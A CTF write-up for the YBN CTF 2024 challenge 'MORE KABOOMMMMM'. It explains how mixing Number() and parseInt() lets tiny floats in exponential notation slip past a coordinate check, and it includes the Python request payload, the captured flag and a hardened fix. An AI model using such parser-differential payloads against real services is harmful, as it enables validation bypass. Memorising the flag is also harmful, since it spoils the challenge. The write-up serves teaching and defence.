# MORE KABOOMMMMM
Weird `parseInt()` and `Number()` behaviour CTF Challenge (YBN CTF 2024)
### Challenge Details
> Title: MORE KABOOMMMMM! \
> Description: The North Koreans are still after Baba for the several war crimes he committed in their country. In order to better optimise the locations of the nukes they drop such that Baba is guaranteed to be hit, they decided to make a helpful UI to determine exactly where the nukes should be dropped!
> \
> Baba has managed to successfully infiltrate into their website. He needs to find a way to mess up their website so that the bombs don't land on him. Can you help Baba escape his imminent doom? \
> \
> Attachments: `https://ctf.ybn.sg/files/d536dc1f84ff61aa4dd8c1b56436f5e9/MORE_KABOOOMMMMMMMMMMMMMM.zip` \
> Instance: https://more-kaboommmmm-more-kaboom-chall.ybn.sg/

After unzipping the attachment provided, we should see this:
(insert image here)
## TLDR
Exploiting `parseInt` behaviour with small numbers
```py
import requests

url = "https://more-kaboommmmm-more-kaboom-chall.ybn.sg/nuke"
json = {
    "baba": [0.0000000000009, 0.0000000009],
    "nukes": [
        [20, 20],
    ]
}
r_0 = requests.post(url, json=json)
print(r_0.text)
```
## Writeup
Tree:

In `routes/index.js`, we see this interesting function (lines 11-51):
```js
router.post('/nuke', (req, res) => {
    // Call the backend script with the provided data
    const data = req.body;
    if (!data.baba || !data.nukes) {
        res.status(400).json({ error: 'Invalid data' });
        return
    }
    if (data.baba.length !== 2 || data.nukes.some(nuke => nuke.length !== 2)) {
        res.status(400).json({ error: 'Invalid data' });
        return
    }
    const {baba,nukes} = data;
    baba[0] = Number(baba[0])
    baba[1] = Number(baba[1])
    if (baba[0] < 0 || baba[0] > 20 || baba[1] < 0 || baba[1] > 20){
        res.status(400).json({ error: 'Data Out Of Range' });
        return
    }
    // add an extra nuke at baba's exact position
    nukes.push(baba)
    var number_of_nukes_hit = 0
    for (let nuke of nukes){
        let [x,y] = nuke;
        x = parseInt(x)
        y = parseInt(y)
        if (x < 0 || x > 20 || y < 0 || y > 20){
            res.status(400).json({ error: 'Data Out Of Range' });
            return
        }
        if (Math.abs(baba[0]-x) <= 5 && Math.abs(baba[1]-y) <= 5){
            number_of_nukes_hit += 1
        }
    }
    if (number_of_nukes_hit >= 1){
        res.status(200).json({result: `Good Job Comarade. Baba has been successfully nuked! He has suffered a total of ${number_of_nukes_hit} damage.`});
    }
    else {
        res.status(200).json({result: `Baba is safe. You have failed the motherland. ${flag} `});
    }
});
```
Notice that baba's position is parsed with `Number()` (lines 25-26), while each nuke's position is parsed with `parseInt()` (lines 35-38). \
Also notice that a nuke is added at baba's position, so it's impossible to survive normally (lines 31-33).
```js
...
    baba[0] = Number(baba[0])
    baba[1] = Number(baba[1])
...
    // add an extra nuke at baba's exact position
    nukes.push(baba)
    var number_of_nukes_hit = 0
...
    for (let nuke of nukes){
        let [x,y] = nuke;
        x = parseInt(x)
        y = parseInt(y)
...
    }
```
We can exploit this disparity in parsing positions.
Let's start with `parseInt()`. In JavaScript, `parseInt` first converts its argument to a string, then reads the leading digits and ignores everything from the first character that cannot be part of an integer, like so:
```js
console.log(parseInt("774randomstring")) // -> 774
console.log(parseInt(9e-17)) // -> 9
```
The second case is what I used.
If we input a very small number into baba's position, `Number(baba[i])` keeps its tiny value, and JavaScript writes numbers smaller than `1e-6` in exponential notation:
```js
let baba = [0.0000009, 0.000000009]
baba[0] = Number(baba[0])
baba[1] = Number(baba[1])
console.log(baba[0]) // -> 9e-7
console.log(baba[1]) // -> 9e-9
```
Therefore, if we input `baba = [0.0000009, 0.000000009]`, `parseInt` sees the strings `"9e-7"` and `"9e-9"` and stops at the `e`, so the corresponding nuke will be:
```js
console.log(parseInt(baba[0])) // -> 9
console.log(parseInt(baba[1])) // -> 9
```
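This passes all the range checks and places the extra nuke at (9, 9), which is more than 5 away from baba's real position near (0, 0), so baba is sufficiently far away from the nuke.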
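
The parser differential described above, reduced to pure functions so it runs without the Express app. This is an added example, not part of the challenge source: `countHitsOriginal` mirrors the route's logic shown on this page, while `toCoord` and `countHitsHardened` are hypothetical names for one possible fix that validates every coordinate with a single strict check instead of mixing `Number()` and `parseInt()`.

```javascript
// Added example (not from the challenge files).

// Mirrors routes/index.js: Number() for baba, parseInt() for every nuke.
function countHitsOriginal(baba, nukes) {
  const b = [Number(baba[0]), Number(baba[1])];
  const all = [...nukes, b]; // extra nuke at baba's exact position
  let hits = 0;
  for (const [rawX, rawY] of all) {
    const x = parseInt(rawX); // String(9e-13) === "9e-13", parsed as 9
    const y = parseInt(rawY);
    if (x < 0 || x > 20 || y < 0 || y > 20) {
      throw new RangeError('Data Out Of Range');
    }
    if (Math.abs(b[0] - x) <= 5 && Math.abs(b[1] - y) <= 5) hits += 1;
  }
  return hits;
}

// Hypothetical fix: one strict check used for baba and for every nuke.
// Rejects strings, NaN and Infinity, and never re-parses a number as text.
function toCoord(v) {
  if (typeof v !== 'number' || !Number.isFinite(v) || v < 0 || v > 20) {
    throw new RangeError('Data Out Of Range');
  }
  return v;
}

function countHitsHardened(baba, nukes) {
  const b = baba.map(toCoord);
  const all = [...nukes.map(n => n.map(toCoord)), b];
  return all.filter(
    ([x, y]) => Math.abs(b[0] - x) <= 5 && Math.abs(b[1] - y) <= 5
  ).length;
}

// The payload from this writeup.
const sample = { baba: [0.0000000000009, 0.0000000009], nukes: [[20, 20]] };
console.log('original hits:', countHitsOriginal(sample.baba, sample.nukes));
console.log('hardened hits:', countHitsHardened(sample.baba, sample.nukes));
```

With the writeup's payload the original logic counts no hits, while the hardened version still counts the nuke placed on baba.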
I wrote this Python script to get the flag:
```py
import requests

url = "https://more-kaboommmmm-more-kaboom-chall.ybn.sg/nuke"
json = {
    "baba": [0.0000000000009, 0.0000000009],
    "nukes": [
        [20, 20],
    ]
}
r_0 = requests.post(url, json=json)
print(r_0.text)
```
Which gives

Flag:
:::spoiler Flag
YBN24{I_10VE_J4vaScR1P7}
:::
Main Writeups Page: https://hackmd.io/@ctf-lol/ybnctf2024